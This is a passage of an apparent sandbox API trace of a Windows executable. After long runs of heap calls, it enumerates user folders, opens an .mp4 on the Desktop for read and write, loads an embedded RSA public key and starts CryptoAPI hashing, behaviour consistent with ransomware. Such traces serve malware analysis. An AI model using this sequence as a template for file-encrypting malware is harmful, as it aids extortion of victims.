(HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.256] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0192.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0192.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0192.256] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0192.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.256] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.256] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.257] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.257] PathFindFileNameW (pszPath="") returned="" [0192.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.257] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0192.257] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.257] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0192.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0192.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0192.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.257] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0192.257] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0192.258] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0192.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40210 [0192.258] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0192.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.262] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0192.262] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0192.262] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\") returned="YnPBSI277\\" [0192.262] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0192.262] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.262] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ab8 | out: hHeap=0x2c0000) returned 1 [0192.262] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.262] PathFindFileNameW (pszPath="") returned="" [0192.262] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4bcfb30, ftCreationTime.dwHighDateTime=0x1d8995c, ftLastAccessTime.dwLowDateTime=0xece51490, ftLastAccessTime.dwHighDateTime=0x1d8a365, ftLastWriteTime.dwLowDateTime=0xece51490, ftLastWriteTime.dwHighDateTime=0x1d8a365, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0192.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.264] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4bcfb30, ftCreationTime.dwHighDateTime=0x1d8995c, ftLastAccessTime.dwLowDateTime=0xece51490, ftLastAccessTime.dwHighDateTime=0x1d8a365, ftLastWriteTime.dwLowDateTime=0xece51490, ftLastWriteTime.dwHighDateTime=0x1d8a365, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.264] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4893000, ftCreationTime.dwHighDateTime=0x1d89a17, ftLastAccessTime.dwLowDateTime=0xa587b860, ftLastAccessTime.dwHighDateTime=0x1d89a86, ftLastWriteTime.dwLowDateTime=0xa587b860, ftLastWriteTime.dwHighDateTime=0x1d89a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5Ctq03jfOkJI397", cAlternateFileName="5CTQ03~1")) returned 1 [0192.264] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26438ff0, ftCreationTime.dwHighDateTime=0x1d89b5f, ftLastAccessTime.dwLowDateTime=0x1adb3990, ftLastAccessTime.dwHighDateTime=0x1d89d32, ftLastWriteTime.dwLowDateTime=0x1adb3990, ftLastWriteTime.dwHighDateTime=0x1d89d32, nFileSizeHigh=0x0, nFileSizeLow=0xfc31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bp67ry2E oYq1FPgm.mp4", cAlternateFileName="BP67RY~1.MP4")) returned 1 [0192.264] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\bp67ry2E oYq1FPgm.mp4") returned=".mp4" [0192.264] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\bp67ry2E oYq1FPgm.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\bp67ry2e oyq1fpgm.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.266] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=64561) returned 1 [0192.266] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.269] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xfc0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.269] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.271] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.271] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xfc31, lpOverlapped=0x0) returned 1 [0192.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.273] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0192.274] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, 